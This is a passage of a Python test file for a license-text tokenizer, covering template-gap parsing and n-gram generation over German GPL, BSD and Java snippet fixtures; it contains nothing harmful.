Token(start_line=8, end_line=8, start_char=70, end_char=75, value=u'ihnen', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=76, end_char=79, value=u'von', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=1, end_char=7, value=u'nutzen', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=9, end_char=10, value=u'n', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=1, end_char=5, value=u'sein', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=6, end_char=10, value=u'wird', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=12, end_char=16, value=u'aber', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=17, end_char=21, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=22, end_char=32, value=u'irgendeine', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=33, end_char=41, value=u'garantie', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=43, end_char=48, value=u'sogar', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=49, end_char=53, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=54, end_char=57, value=u'die', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=58, end_char=67, value=u'implizite', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=68, end_char=76, value=u'garantie', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=5, end_char=15, value=u'marktreife', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=1, end_char=5, value=u'oder', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=6, end_char=9, value=u'der', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=10, end_char=24, value=u'verwendbarkeit', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=25, end_char=28, value=u'f\xfcr', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=29, end_char=34, value=u'einen', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=35, end_char=45, value=u'bestimmten', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=46, end_char=51, value=u'zweck', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=53, end_char=60, value=u'details', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=61, end_char=67, value=u'finden', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=68, end_char=71, value=u'sie', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=72, end_char=74, value=u'in', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=5, end_char=8, value=u'gnu', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=9, end_char=16, value=u'general', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=18, end_char=19, value=u'n', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=15, end_line=15, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=1, end_char=4, value=u'sie', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=5, end_char=12, value=u'sollten', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=13, end_char=16, value=u'ein', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=17, end_char=25, value=u'exemplar', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=26, end_char=29, value=u'der', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=30, end_char=33, value=u'gnu', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=34, end_char=41, value=u'general', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=42, end_char=48, value=u'public', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=49, end_char=56, value=u'license', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=57, end_char=65, value=u'zusammen', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=66, end_char=69, value=u'mit', gap=DEFAULT_GAP),
Token(start_line=17, end_line=17, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=1, end_char=9, value=u'erhalten', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=10, end_char=15, value=u'haben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=17, end_char=22, value=u'falls', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=23, end_char=28, value=u'nicht', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=30, end_char=39, value=u'schreiben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=40, end_char=43, value=u'sie', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=44, end_char=46, value=u'an', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=47, end_char=50, value=u'die', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=51, end_char=55, value=u'free', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=56, end_char=64, value=u'software', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=65, end_char=75, value=u'foundation', gap=NO_GAP),
Token(start_line=19, end_line=19, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=1, end_char=4, value=u'inc', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=7, end_char=9, value=u'51', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=10, end_char=18, value=u'franklin', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=19, end_char=21, value=u'st', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=23, end_char=28, value=u'fifth', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=29, end_char=34, value=u'floor', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=36, end_char=42, value=u'boston', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=44, end_char=46, value=u'ma', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=47, end_char=52, value=u'02110', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=54, end_char=57, value=u'usa', gap=NO_GAP),
]
test_file = self.get_test_loc('analysis/unicode/12180.txt')
with codecs.open(test_file, encoding='utf-8') as test:
result = list(self.template_parsing(test))
assert expected == result
def test_process_template_does_not_crash_on_unicode_rules_text_1(self):
test_file = self.get_test_loc('analysis/unicode/12290.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_2(self):
test_file = self.get_test_loc('analysis/unicode/12319.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_3(self):
test_file = self.get_test_loc('analysis/unicode/12405.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_4(self):
test_file = self.get_test_loc('analysis/unicode/12407.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_5(self):
test_file = self.get_test_loc('analysis/unicode/12420.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_detects_non_well_formed_templatized_regions(self):
lines = u'abcd{{ef'
self.assertRaises(UnbalancedTemplateError, self.template_parsing, lines)
def test_process_template_handles_combination_of_well_formed_and_ill_formed_templates_2(self):
lines = u'}}{{{{abc}}ddd}}{{'
self.assertRaises(UnbalancedTemplateError, self.template_parsing, lines)
def test_process_template_can_parse_ill_formed_template(self):
tf = self.get_test_loc('analysis/ill_formed_template/text.txt')
lines = unicode_text_lines(tf)
result = list(self.template_parsing(lines))
expected_gaps = [30, 10, 60, 70, 20]
result_gaps = [x.gap for x in result if x.gap]
assert expected_gaps == result_gaps
et = self.get_test_loc('analysis/ill_formed_template/expected_grams.json')
result_dicts = [t._asdict() for t in result]
regen = False
if regen:
with codecs.open(et, 'w', encoding='utf-8') as out:
json.dump(result_dicts, out, indent=2)
with codecs.open(et, encoding='utf-8') as inp:
expected = json.load(inp)
assert expected == result_dicts
def test_token_positions_are_kept_same_for_unigrams_and_ngrams_with_template(self):
lines = u'some text is some text {{ }} in all cases\n \n'
unigrams = unigram_tokenizer(iter([lines]), template=False)
tunigrams = unigram_tokenizer(iter([lines]), template=True)
ngrams = ngram_tokenizer(iter([lines]), ngram_len=3, template=False)
tngrams = ngram_tokenizer(iter([lines]), ngram_len=3, template=True)
expected_start_end = (0, 7,)
def check_start_end(l):
l = list(l)
result = (l[0].start, l[-1].end,)
assert expected_start_end == result
check_start_end(unigrams)
check_start_end(tunigrams)
check_start_end(ngrams)
check_start_end(tngrams)
def test_plain_unigrams_from_templated_unigrams(self):
lines = [u'My old tailor {{3 John Doe}} is quite very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
result = list(template_processor(unigrams))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=0, value=u'my'),
Token(start=0, start_line=0, start_char=3, end_line=0, end_char=6, end=0, gap=0, value=u'old'),
Token(start=0, start_line=0, start_char=7, end_line=0, end_char=13, end=0, gap=3, value=u'tailor'),
Token(start=0, start_line=0, start_char=29, end_line=0, end_char=31, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=32, end_line=0, end_char=37, end=0, gap=0, value=u'quite'),
Token(start=0, start_line=0, start_char=38, end_line=0, end_char=42, end=0, gap=0, value=u'very'),
Token(start=0, start_line=0, start_char=43, end_line=0, end_char=47, end=0, gap=0, value=u'rich'),
]
assert expected == result
class TestLegacyNgrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_plain_ngrams_processor(self):
from collections import deque
def ngram_processor(items, ngram_len):
"""
Given a sequence or iterable of arbitrary items, return an iterator of
item ngrams tuples of length ngram_len. Buffers at most ngram_len iterable
items.
For example::
>>> list(ngram_processor([1, 2, 3, 4, 5], ngram_len=3))
[(1, 2, 3), (2, 3, 4), (3, 4, 5)]
"""
ngram = deque()
current_len = 0
for item in items:
if current_len == ngram_len:
yield tuple(ngram)
ngram.popleft()
current_len -= 1
ngram.append(item)
current_len += 1
yield tuple(ngram)
text = (
u'''/*COMMENT
COMMENT COMMENT
- COMMENT
*/
public static boolean activateSearchResultView() {
String defaultPerspectiveId= SearchUI.getDefaultPerspectiveId();
if (defaultPerspectiveId != null) {
IWorkbenchWindow window= SearchPlugin.getActiveWorkbenchWindow();
if (window != null && window.getShell() != null && !window.getShell().isDisposed()) {
try {
PlatformUI.getWorkbench().showPerspective(defaultPerspectiveId, window);
} catch (WorkbenchException ex) {
// show view in current perspective
}
}
}''')
expected = [
(u'comment', u'comment', u'comment', u'comment', u'public', u'static'),
(u'comment', u'comment', u'comment', u'public', u'static', u'boolean'),
(u'comment', u'comment', u'public', u'static', u'boolean',
u'activatesearchresultview'),
(u'comment', u'public', u'static', u'boolean',
u'activatesearchresultview', u'string'),
(u'public', u'static', u'boolean', u'activatesearchresultview',
u'string', u'defaultperspectiveid'),
(u'static', u'boolean', u'activatesearchresultview', u'string',
u'defaultperspectiveid', u'searchui'),
(u'boolean', u'activatesearchresultview', u'string',
u'defaultperspectiveid', u'searchui', u'getdefaultperspectiveid'),
(u'activatesearchresultview', u'string', u'defaultperspectiveid',
u'searchui', u'getdefaultperspectiveid', u'if'),
(u'string', u'defaultperspectiveid', u'searchui',
u'getdefaultperspectiveid', u'if', u'defaultperspectiveid'),
(u'defaultperspectiveid', u'searchui', u'getdefaultperspectiveid',
u'if', u'defaultperspectiveid', u'null'),
(u'searchui', u'getdefaultperspectiveid', u'if',
u'defaultperspectiveid', u'null', u'iworkbenchwindow'),
(u'getdefaultperspectiveid', u'if', u'defaultperspectiveid', u'null',
u'iworkbenchwindow', u'window'),
(u'if', u'defaultperspectiveid', u'null', u'iworkbenchwindow',
u'window', u'searchplugin'),
(u'defaultperspectiveid', u'null', u'iworkbenchwindow', u'window',
u'searchplugin', u'getactiveworkbenchwindow'),
(u'null', u'iworkbenchwindow', u'window', u'searchplugin',
u'getactiveworkbenchwindow', u'if'),
(u'iworkbenchwindow', u'window', u'searchplugin',
u'getactiveworkbenchwindow', u'if', u'window'),
(u'window', u'searchplugin', u'getactiveworkbenchwindow', u'if',
u'window', u'null'),
(u'searchplugin', u'getactiveworkbenchwindow', u'if', u'window',
u'null', u'window'),
(u'getactiveworkbenchwindow', u'if', u'window', u'null', u'window',
u'getshell'),
(u'if', u'window', u'null', u'window', u'getshell', u'null'),
(u'window', u'null', u'window', u'getshell', u'null', u'window'),
(u'null', u'window', u'getshell', u'null', u'window', u'getshell'),
(u'window', u'getshell', u'null', u'window', u'getshell', u'isdisposed'),
(u'getshell', u'null', u'window', u'getshell', u'isdisposed', u'try'),
(u'null', u'window', u'getshell', u'isdisposed', u'try', u'platformui'),
(u'window', u'getshell', u'isdisposed', u'try', u'platformui',
u'getworkbench'),
(u'getshell', u'isdisposed', u'try', u'platformui', u'getworkbench',
u'showperspective'),
(u'isdisposed', u'try', u'platformui', u'getworkbench',
u'showperspective', u'defaultperspectiveid'),
(u'try', u'platformui', u'getworkbench', u'showperspective',
u'defaultperspectiveid', u'window'),
(u'platformui', u'getworkbench', u'showperspective',
u'defaultperspectiveid', u'window', u'catch'),
(u'getworkbench', u'showperspective', u'defaultperspectiveid',
u'window', u'catch', u'workbenchexception'),
(u'showperspective', u'defaultperspectiveid', u'window', u'catch',
u'workbenchexception', u'ex'),
(u'defaultperspectiveid', u'window', u'catch', u'workbenchexception',
u'ex', u'show'),
(u'window', u'catch', u'workbenchexception', u'ex', u'show', u'view'),
(u'catch', u'workbenchexception', u'ex', u'show', u'view', u'in'),
(u'workbenchexception', u'ex', u'show', u'view', u'in', u'current'),
(u'ex', u'show', u'view', u'in', u'current', u'perspective'),
]
unigrams = (x.value for x
in unigram_splitter(text.splitlines()))
result = list(ngram_processor(unigrams, ngram_len=6))
assert expected == result
class TestNgrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_tokens_ngram_processor_bigrams_from_unigrams(self):
text = u'this is some text \n on multiple lines'
unigrams = unigram_splitter(text.splitlines())
result = list(tokens_ngram_processor(unigrams, ngram_len=2))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some')),
(Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text')),
(Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on')),
(Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple')),
(Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple'),
Token(start_line=1, start_char=13, end_line=1, end_char=18, value=u'lines'))
]
assert expected == result
def test_tokens_ngram_processor_n2_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=2))
assert expected == result
def test_tokens_ngram_processor_n3_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=3))
assert expected == result
def test_tokens_ngram_processor_n4_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=4))
assert expected == result
def test_tokens_ngram_processor_n10_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=10))
assert expected == result
def test_tokens_ngram_processor_n1_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=1))
assert expected == result
def test_tokens_ngram_processor_3grams_from_unigrams_on_multilines(self):
text = u'this is some text \n on multiple lines'
unigrams = unigram_splitter(text.splitlines())
result = list(tokens_ngram_processor(unigrams, ngram_len=3))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some')),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text')),
(Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on')),
(Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple')),
(Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple'),
Token(start_line=1, start_char=13, end_line=1, end_char=18, value=u'lines'))
]
assert expected == result
def test_tokens_ngram_processor_with_template_gaps_basic(self):
lines = [u'My old {{3 John Doe}} is rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=3))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=0, value=u'my'),
Token(start=0, start_line=0, start_char=3, end_line=0, end_char=6, end=0, gap=3, value=u'old'),
),
(Token(start=0, start_line=0, start_char=22, end_line=0, end_char=24, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=25, end_line=0, end_char=29, end=0, gap=0, value=u'rich'),
)
]
assert expected == result
def test_tokens_ngram_processor_with_template_gaps_merged(self):
lines = [u'My old tailor {{3 John Doe}} is quite very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start_line=0, start_char=0, end_line=0, end_char=13, gap=ngram_len, value=(u'my', u'old', u'tailor')),
Token(start_line=0, start_char=29, end_line=0, end_char=42, gap=0, value=(u'is', u'quite', u'very')),
Token(start_line=0, start_char=32, end_line=0, end_char=47, gap=0, value=(u'quite', u'very', u'rich')),
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_short_grams(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }} very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite')),
Token(start=0, start_line=0, start_char=48, end_line=0, end_char=57, end=0, gap=0, value=(u'very', u'rich'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_short_and_long_grams(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }} very rich really rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite')),
Token(start=0, start_line=0, start_char=48, end_line=0, end_char=64, end=0, gap=0, value=(u'very', u'rich', u'really')),
Token(start=0, start_line=0, start_char=53, end_line=0, end_char=69, end=0, gap=0, value=(u'rich', u'really', u'rich'))
]
assert expected == result
def test_ngram_to_token_processor_with_gaps_at_the_end(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }}']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_at_the_end_does_yield_empty_tuples(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }}']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
result = list(tokens_ngram_processor(templated, ngram_len=ngram_len))
assert (None, None, None,) != result[-1]
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=u'my'),),
(Token(start=0, start_line=0, start_char=20, end_line=0, end_char=22, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=23, end_line=0, end_char=28, end=0, gap=5, value=u'quite'),
)
]
assert expected == result
def test_ngrams_tokenizer_does_not_yield_4grams_for_3grams(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the names {{}}of its contributors may
materials provided with the distribution.'''.splitlines()
result = list(ngram_tokenizer(iter(lines), ngram_len=3, template=True))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=16, end=2, gap=0, value=(u'neither', u'the', u'name')),
Token(start=1, start_line=0, start_char=8, end_line=0, end_char=19, end=3, gap=10, value=(u'the', u'name', u'of')),
Token(start=4, start_line=0, start_char=44, end_line=0, end_char=47, end=4, gap=5, value=(u'nor',)),
Token(start=5, start_line=0, start_char=52, end_line=0, end_char=61, end=6, gap=5, value=(u'the', u'names')),
Token(start=7, start_line=0, start_char=66, end_line=0, end_char=85, end=9, gap=0, value=(u'of', u'its', u'contributors')),
Token(start=8, start_line=0, start_char=69, end_line=0, end_char=89, end=10, gap=0, value=(u'its', u'contributors', u'may')),
Token(start=9, start_line=0, start_char=73, end_line=1, end_char=25, end=11, gap=0, value=(u'contributors', u'may', u'materials')),
Token(start=10, start_line=0, start_char=86, end_line=1, end_char=34, end=12, gap=0, value=(u'may', u'materials', u'provided')),
Token(start=11, start_line=1, start_char=16, end_line=1, end_char=39, end=13, gap=0, value=(u'materials', u'provided', u'with')),
Token(start=12, start_line=1, start_char=26, end_line=1, end_char=43, end=14, gap=0, value=(u'provided', u'with', u'the')),
Token(start=13, start_line=1, start_char=35, end_line=1, end_char=56, end=15, gap=0, value=(u'with', u'the', u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_always_returns_3grams_when_requested(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the
names {{}}of its contributors may materials provided with
the distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=3))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name')),
(Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=0, start_char=52, end_line=0, end_char=55, end=0, gap=0, value=u'the'),
Token(start=0, start_line=1, start_char=19, end_line=1, end_char=24, end=0, gap=5, value=u'names')),
(Token(start=0, start_line=1, start_char=29, end_line=1, end_char=31, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=23, end_line=2, end_char=35, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_always_returns_4grams_when_requested(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the
names {{}}of its contributors may materials provided with
the distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=4))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=0, start_char=52, end_line=0, end_char=55, end=0, gap=0, value=u'the'),
Token(start=0, start_line=1, start_char=19, end_line=1, end_char=24, end=0, gap=5, value=u'names')),
(Token(start=0, start_line=1, start_char=29, end_line=1, end_char=31, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
